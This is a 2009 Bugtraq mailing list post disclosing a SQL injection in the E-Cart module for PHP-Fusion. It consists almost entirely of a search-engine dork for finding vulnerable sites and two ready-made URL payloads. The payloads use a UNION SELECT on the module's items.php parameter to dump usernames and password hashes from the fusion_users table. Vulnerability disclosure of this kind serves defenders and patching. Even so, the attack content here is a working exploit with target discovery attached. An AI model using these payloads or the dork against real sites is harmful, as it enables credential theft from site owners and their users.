Bugtraq mailing list archives
PHP-Fusion Mod E-Cart Sql Injection
From: r3d.w0rm () yahoo com
Date: Wed, 7 Jan 2009 04:53:43 -0700
##################################################################################### #### PHP-Fusion Mod E-Cart Sql Injection #### ##################################################################################### # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi ##################################################################################### # # #Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=281 # # #Dork : inurl:/infusions/e_cart # # # ##################################################################################### # [Bug] # # # #Username : http://Site/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select%20user_name,1,2%20from%20fusion_users/* # # #Password : http://Site/[path]/infusions/e_cart/items.php?CA=-9999'%20union%20select%20user_password,1,2%20from%20fusion_users/* # # ##################################################################################### # Site : Http://IRCRASH.COM # ###################################### TNX GOD ######################################
Current thread:
- PHP-Fusion Mod E-Cart Sql Injection r3d . w0rm (Jan 07)